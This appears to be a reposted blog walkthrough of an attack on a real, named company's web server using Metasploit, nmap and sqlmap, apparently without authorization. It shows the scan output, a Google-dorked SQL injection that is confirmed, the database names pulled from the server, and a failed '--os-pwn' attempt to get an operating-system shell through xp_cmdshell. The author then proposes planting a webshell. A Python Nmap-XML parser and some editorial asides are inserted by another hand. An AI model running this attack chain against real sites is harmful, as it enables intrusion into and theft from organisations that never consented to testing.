Source: http://hi.baidu.com/p3rlish/blog/item/f54f4c097a907f8ad1581b0b.html

All in one: pentest under metasploit
2009-06-02 00:27

Metasploit is a well-known penetration testing framework that bundles a large share of the tooling an intrusion test needs, and the range of what it can do is impressive. Dig into it gradually and you will come to like it.

Today I will show how to run a penetration test inside Metasploit, from basic information gathering, to the break-in, to post-exploitation on the inside, with everything done from within Metasploit. First, update Metasploit to the latest version:

root@ubuntu:/pentest/exploits/framework3# svn update
A    modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
At revision 6609.

We are already on the latest version; start framework3:

root@ubuntu:/pentest/exploits/framework3# ./msfconsole

|                    |      _) |
__ `__ \   _ \ __| _` | __| __ \ | _ \ | __|
|   |   | __/ |   (   |\__ \ |   | | (   | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux

msf >

Once the target is chosen, the first task is information gathering: DNS lookups, server type, open ports and services. Before scanning, load the WMAP plugin and connect a database, so that the scan results are stored and can be queried later with db_hosts and db_services:

msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_driver
[*]    Active Driver: sqlite3
[*]        Available: sqlite3, mysql
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
msf > db_connect pentest
[*] Successfully connected to the database
[*] File: pentest
msf >

Next, resolve the target host's IP address:

msf > nslookup www.prolific.com.tw
[*] exec: nslookup www.prolific.com.tw

Server:         202.100.192.68
Address:        202.100.192.68#53

Non-authoritative answer:
www.prolific.com.tw canonical name = dns1.prolific.com.tw.
Name: dns1.prolific.com.tw
Address: 59.124.181.149
What remains is collecting open ports and service banners. Metasploit offers several ways to do this; out of habit I use nmap, through db_nmap so the results land in the database, and at the same time run the SQLInject NSE script to check for SQL injection:

msf > db_nmap -sV -P0 -O www.prolific.com.tw --script=SQLInject.nse
[*] exec: "/usr/bin/nmap" "-sV" "-P0" "-O" "www.prolific.com.tw" "--script=SQLInject.nse" "-oX" "/tmp/dbnmap20090602-28001-njyqqa-0"
NMAP:
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2009-06-02 03:14 CST
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/skype_v2-version.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/iax2Detect.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/PPTPversion.nse’ threw a run time error and could not be loaded.
NMAP: Interesting ports on 59.124.181.149:
NMAP: Not shown: 996 filtered ports
NMAP: PORT    STATE SERVICE VERSION
NMAP: 21/tcp open   ftp     Serv-U ftpd 6.4
NMAP: 53/tcp open   domain Microsoft DNS
NMAP: 80/tcp open   http    Microsoft IIS webserver 6.0
NMAP: 443/tcp closed https
NMAP: Device type: general purpose
NMAP: Running (JUST GUESSING) : Microsoft Windows 2003|2000|XP (98%)
NMAP: Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (98%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP Home SP2 (Russian) (93%), Microsoft Windows XP SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows 2000 Server SP4 (90%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (90%), Microsoft Windows Server 2003 Enterprise Edition SP2 (88%), Microsoft Windows XP Professional SP2 (French) (88%)
NMAP: No exact OS matches for host (test conditions non-ideal).
NMAP: Service Info: OS: Windows
NMAP:
NMAP: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
NMAP: Nmap done: 1 IP address (1 host up) scanned in 94.14 seconds

The NSE script reported no SQL injection. The scan shows FTP (Serv-U 6.4), DNS (Microsoft DNS) and HTTP (IIS 6.0) open, and nmap's best fingerprint is Windows Server 2003; note that nmap itself marks this as "JUST GUESSING" with no exact match, so treat the OS as unconfirmed. Since the Windows DNS service has had remote stack overflow vulnerabilities, the first thought is to try an overflow against the target. First, check what db_nmap stored:

msf > db_hosts
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Host: 59.124.181.149 Status: alive OS:
msf > db_services
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=21 proto=tcp state=up name=ftp
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=53 proto=tcp state=up name=domain
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=80 proto=tcp state=up name=http
msf>
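db_nmap passes -oX to nmap and imports the resulting XML, which is how the db_hosts and db_services records above get populated. The parser below is an added example, not code from this page or from Metasploit: it reads a constructed Nmap XML document shaped like the scan above (documentation address 192.0.2.10, not the real target) into host and service records, keeps only open ports as services the way db_services does, and reports the OS match together with its accuracy so that a 98% guess is not mistaken for a confirmed fingerprint. The function names and the sample document are mine.

```python
"""Parse Nmap -oX output into host/service records, the way db_nmap feeds db_hosts/db_services."""
import xml.etree.ElementTree as ET

# Constructed sample (not a real capture): same port/service layout as the scan on this page,
# with a documentation address standing in for the target.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -P0 -O -oX - 192.0.2.10" version="4.76">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <extraports state="filtered" count="996"/>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="Serv-U ftpd" version="6.4"/></port>
      <port protocol="tcp" portid="53"><state state="open"/><service name="domain" product="Microsoft DNS"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS webserver" version="6.0"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
    <os>
      <osmatch name="Microsoft Windows Server 2003 SP2" accuracy="98"/>
      <osmatch name="Microsoft Windows 2000 SP4" accuracy="93"/>
    </os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host: address, state, best OS match with accuracy, and every port seen."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.iter("host"):
        addr_el = h.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        status = h.find("status")
        host = {
            "address": addr_el.get("addr"),
            "state": status.get("state") if status is not None else "unknown",
            "os_guess": None,
            "os_accuracy": 0,
            "services": [],
        }
        # Keep the highest-accuracy osmatch; anything under 100 is nmap guessing.
        for m in h.iter("osmatch"):
            acc = int(m.get("accuracy", "0"))
            if acc > host["os_accuracy"]:
                host["os_guess"], host["os_accuracy"] = m.get("name"), acc
        for p in h.iter("port"):
            state = p.find("state")
            svc = p.find("service")
            host["services"].append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
        hosts.append(host)
    return hosts


def open_services(hosts):
    """Mirror db_services: only ports in state 'open' become service records."""
    return [(h["address"], s["port"], s["proto"], s["name"])
            for h in hosts for s in h["services"] if s["state"] == "open"]


def os_summary(host):
    """Report the OS as what it is: a fingerprint with an accuracy figure, flagged as a guess below 100."""
    if not host["os_guess"]:
        return "unknown"
    qualifier = "" if host["os_accuracy"] == 100 else " (guess)"
    return f"{host['os_guess']} {host['os_accuracy']}%{qualifier}"


if __name__ == "__main__":
    hosts = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in hosts:
        print(f"Host: {h['address']} Status: {h['state']} OS: {os_summary(h)}")
    for addr, port, proto, name in open_services(hosts):
        print(f"Service: host={addr} port={port} proto={proto} state=up name={name}")
```

Running it prints the same shape of output as db_hosts and db_services above, with the difference that the OS column carries the accuracy and the word "guess", which is the detail the real db_hosts line (empty OS field) and the author's "Windows Server 2003" conclusion both drop.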

The overflow route looks hopeless (note also that db_hosts recorded an empty OS field, so the database holds nothing to pick an exploit against). Next, test for SQL injection; a site like this is likely to have one. We use the sqlmap module:

msf > use auxiliary/scanner/http/wmap_sqlmap
msf auxiliary(wmap_sqlmap) >

OK, look at the module information:
msf auxiliary(wmap_sqlmap) > info

Name: SQLMAP SQL Injection External Module
Version: 5849

Provided by:
bernardo.damele <bernardo.damele@gmail.com>
daniele.bellucci <daniele.bellucci@gmail.com>

Basic options:
Name         Current Setting    Required  Description
----         ---------------    --------  -----------
BATCH        true               yes       Never ask for user input, use the default behaviour
BODY                            no        The data string to be sent through POST
METHOD       GET                yes       HTTP Method
OPTS                            no        The sqlmap options to use
PATH         index.php          yes       The path/file to test for SQL injection
Proxies                         no        Use a proxy chain
QUERY        id=1               no        HTTP GET query
RHOSTS                          yes       The target address range or CIDR identifier
RPORT        80                 yes       The target port
SQLMAP_PATH  /sqlmap/sqlmap.py  yes       The sqlmap >= 0.6.1 full path
SSL          false              no        Use SSL
THREADS      1                  yes       The number of concurrent threads
VHOST                           no        HTTP server virtual host

Description:
This module launch a sqlmap session. sqlmap is an automatic SQL
injection tool developed in Python. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once
it detects one or more SQL injections on the target host, the user
can choose among a variety of options to perform an extensive
back-end database management system fingerprint, retrieve DBMS
session user and database, enumerate users, password hashes,
privileges, databases, dump entire or user specific DBMS
tables/columns, run his own SQL SELECT statement, read specific
files on the file system and much more.
I will not go through every option; next, set the ones we need:
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set OPTS '-g "site:www.prolific.com.tw ext:asp" --dbs'
OPTS => -g "site:www.prolific.com.tw ext:asp" --dbs
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py

Next, review the configuration:
msf auxiliary(wmap_sqlmap) > show options

Module options:

Name         Current Setting                                Required  Description
----         ---------------                                --------  -----------
BATCH        true                                           yes       Never ask for user input, use the default behaviour
BODY                                                        no        The data string to be sent through POST
METHOD       GET                                            yes       HTTP Method
OPTS         -g "site:www.prolific.com.tw ext:asp" --dbs    no        The sqlmap options to use
PATH         index.php                                      yes       The path/file to test for SQL injection
Proxies                                                     no        Use a proxy chain
QUERY        id=1                                           no        HTTP GET query
RHOSTS       www.prolific.com.tw                            yes       The target address range or CIDR identifier
RPORT        80                                             yes       The target port
SQLMAP_PATH  /var/pentest/database/sqlmap/sqlmap.py         yes       The sqlmap >= 0.6.1 full path
SSL          false                                          no        Use SSL
THREADS      1                                              yes       The number of concurrent threads
VHOST                                                       no        HTTP server virtual host
OK, no problems; start it. One thing to be aware of: the module always builds a -u URL from RHOSTS, RPORT, PATH and QUERY (here the default index.php?id=1, which this target does not serve), while the -g Google dork in OPTS is what actually supplies the list of URLs sqlmap tests.
msf auxiliary(wmap_sqlmap) > run

[*] exec: /var/pentest/database/sqlmap/sqlmap.py -u 'http://59.124.181.149:80/index.php?id=1' --method GET -g "site:www.prolific.com.tw ext:asp" --dbs --batch
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:15:14
SQLMAP:
SQLMAP: [17:15:14] [INFO] first request to Google to get the session cookie
SQLMAP: [17:15:15] [INFO] sqlmap got 100 results for your Google dork expression, 69 of them are testable targets
SQLMAP: [17:15:15] [INFO] sqlmap got a total of 70 targets
SQLMAP: [17:15:15] [INFO] url 1:
SQLMAP: GET http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: do you want to test this url? [Y/n/q]
SQLMAP: > Y
SQLMAP: [17:15:15] [INFO] testing url http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: [17:15:15] [INFO] testing connection to the target url
SQLMAP: [17:15:16] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:15:18] [INFO] url is stable
SQLMAP: [17:15:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
SQLMAP: [17:15:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
SQLMAP: [17:15:20] [INFO] testing if Cookie parameter 'ASPSESSIONIDAADTSSDT' is dynamic
SQLMAP: [17:15:22] [WARNING] Cookie parameter 'ASPSESSIONIDAADTSSDT' is not dynamic
SQLMAP: [17:15:22] [INFO] testing if GET parameter 'ID' is dynamic
SQLMAP: [17:15:23] [INFO] confirming that GET parameter 'ID' is dynamic
SQLMAP: [17:15:25] [INFO] GET parameter 'ID' is dynamic
SQLMAP: [17:15:25] [INFO] testing sql injection on GET parameter 'ID' with 0 parenthesis
SQLMAP: [17:15:25] [INFO] testing unescaped numeric injection on GET parameter 'ID'
SQLMAP: [17:15:25] [INFO] GET parameter 'ID' is not unescaped numeric injectable
SQLMAP: [17:15:25] [INFO] testing single quoted string injection on GET parameter 'ID'
SQLMAP: [17:15:27] [INFO] confirming single quoted string injection on GET parameter 'ID'
SQLMAP: [17:15:28] [INFO] GET parameter 'ID' is single quoted string injectable with 0 parenthesis
SQLMAP: [17:15:28] [INFO] do you want to exploit this SQL injection? [Y/n] Y
SQLMAP: [17:15:28] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:15:30] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:15:30] [INFO] testing MySQL
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:15:31] [INFO] testing Oracle
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:15:31] [INFO] testing PostgreSQL
SQLMAP: [17:15:32] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:15:32] [INFO] testing Microsoft SQL Server
SQLMAP: [17:15:33] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:15:34] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:15:34] [INFO] fetching database names
SQLMAP: [17:15:34] [INFO] fetching number of databases
SQLMAP: [17:15:34] [INFO] retrieved: 7
SQLMAP: [17:15:42] [INFO] retrieved: master
SQLMAP: [17:16:43] [INFO] retrieved: model
SQLMAP: [*] msdb
SQLMAP: [*] Northwind
SQLMAP: [*] Prolific
SQLMAP: [*] pubs
SQLMAP: [*] tempdb
SQLMAP:

OK, this already gives us what we wanted, so interrupt the running process. The database list is worth a look: beside the application's own database, Prolific, the server still carries the SQL Server 2000 sample databases Northwind and pubs next to master, model, msdb and tempdb, which points to a default installation.
[*] Auxiliary module execution completed
msf auxiliary(wmap_sqlmap) >
Next, we point Metasploit at this injection point and let sqlmap try --os-pwn; adjust the parameters:
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set PATH /eng/downloads.asp
PATH => /eng/downloads.asp
msf auxiliary(wmap_sqlmap) > set QUERY ID=30
QUERY => ID=30
msf auxiliary(wmap_sqlmap) > set OPTS '--os-pwn --msf-path=/var/pentest/framework3
OPTS => --os-pwn --msf-path=/var/pentest/framework3
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py
msf auxiliary(wmap_sqlmap) > show options

Module options:

Name         Current Setting                               Required  Description
----         ---------------                               --------  -----------
BATCH        true                                          yes       Never ask for user input, use the default behaviour
BODY                                                       no        The data string to be sent through POST
METHOD       GET                                           yes       HTTP Method
OPTS         --os-pwn --msf-path=/var/pentest/framework3   no        The sqlmap options to use
PATH         /eng/downloads.asp                            yes       The path/file to test for SQL injection
Proxies                                                    no        Use a proxy chain
QUERY        ID=30                                         no        HTTP GET query
RHOSTS       www.prolific.com.tw                           yes       The target address range or CIDR identifier
RPORT        80                                            yes       The target port
SQLMAP_PATH  /var/pentest/database/sqlmap/sqlmap.py        yes       The sqlmap >= 0.6.1 full path
SSL          false                                         no        Use SSL
THREADS      1                                             yes       The number of concurrent threads
VHOST                                                      no        HTTP server virtual host

OK, the options check out; run it. Note in the exec line that follows that PATH was given with a leading slash and the module prepends its own, producing "//eng/downloads.asp"; the target accepted the double slash here, but PATH is meant to be given without the leading slash, as the default value index.php shows.
msf auxiliary(wmap_sqlmap) > run

[*] exec: /var/pentest/database/sqlmap/sqlmap.py -u 'http://59.124.181.149:80//eng/downloads.asp?ID=30' --method GET --os-pwn --msf-path=/var/pentest/framework3 --batch
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:48:11
SQLMAP:
SQLMAP: [17:48:11] [INFO] testing connection to the target url
SQLMAP: [17:48:12] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:48:14] [INFO] url is stable
SQLMAP: [17:48:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
SQLMAP: [17:48:15] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
SQLMAP: [17:48:15] [INFO] testing if Cookie parameter 'ASPSESSIONIDAADTSSDT' is dynamic
SQLMAP: [17:48:15] [WARNING] Cookie parameter 'ASPSESSIONIDAADTSSDT' is not dynamic
SQLMAP: [17:48:15] [INFO] testing if GET parameter 'ID' is dynamic
SQLMAP: [17:48:17] [INFO] confirming that GET parameter 'ID' is dynamic
SQLMAP: [17:48:19] [INFO] GET parameter 'ID' is dynamic
SQLMAP: [17:48:19] [INFO] testing sql injection on GET parameter 'ID' with 0 parenthesis
SQLMAP: [17:48:19] [INFO] testing unescaped numeric injection on GET parameter 'ID'
SQLMAP: [17:48:19] [INFO] GET parameter 'ID' is not unescaped numeric injectable
SQLMAP: [17:48:19] [INFO] testing single quoted string injection on GET parameter 'ID'
SQLMAP: [17:48:22] [INFO] confirming single quoted string injection on GET parameter 'ID'
SQLMAP: [17:48:22] [INFO] GET parameter 'ID' is single quoted string injectable with 0 parenthesis
SQLMAP: [17:48:22] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:48:25] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:48:25] [INFO] testing MySQL
SQLMAP: [17:48:25] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:48:25] [INFO] testing Oracle
SQLMAP: [17:48:26] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:48:26] [INFO] testing PostgreSQL
SQLMAP: [17:48:27] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:48:27] [INFO] testing Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:48:28] [INFO] testing stacked queries support on parameter 'ID'
SQLMAP: [17:48:39] [INFO] the web application supports stacked queries on parameter 'ID'
SQLMAP: [17:48:39] [INFO] testing if current user is DBA
SQLMAP: [17:48:39] [INFO] retrieved: 0
SQLMAP: [17:48:44] [WARNING] the functionality requested might not work because the session user is not a database administrator
SQLMAP: [17:48:44] [INFO] checking if xp_cmdshell extended procedure is available, wait..
SQLMAP: [17:48:44] [INFO] xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y
SQLMAP: [17:48:45] [WARNING] xp_cmdshell re-enabling failed
SQLMAP: [17:48:45] [INFO] creating xp_cmdshell with sp_OACreate
SQLMAP: [17:48:46] [WARNING] xp_cmdshell creation failed, probably because sp_OACreate is disabled
SQLMAP: [17:48:46] [ERROR] unable to proceed without xp_cmdshell
SQLMAP:
SQLMAP: [*] shutting down at: 17:48:46
SQLMAP:
[*] Auxiliary module execution completed
Uh oh, it failed. Stacked queries work on the parameter, but the session user is not a DBA, the attempt to re-enable xp_cmdshell failed, and creating it through sp_OACreate failed as well (sqlmap's reading is that sp_OACreate is disabled), so there is no path from the database to the operating system: this injection point is not running as sa and xp_cmdshell cannot be called. What remains is to consider writing a webshell.

This article is reposted from the sinojelly blog on 51CTO; original link: http://blog.51cto.com/pnig0s1992/346226. Contact the original author for reprint permission.
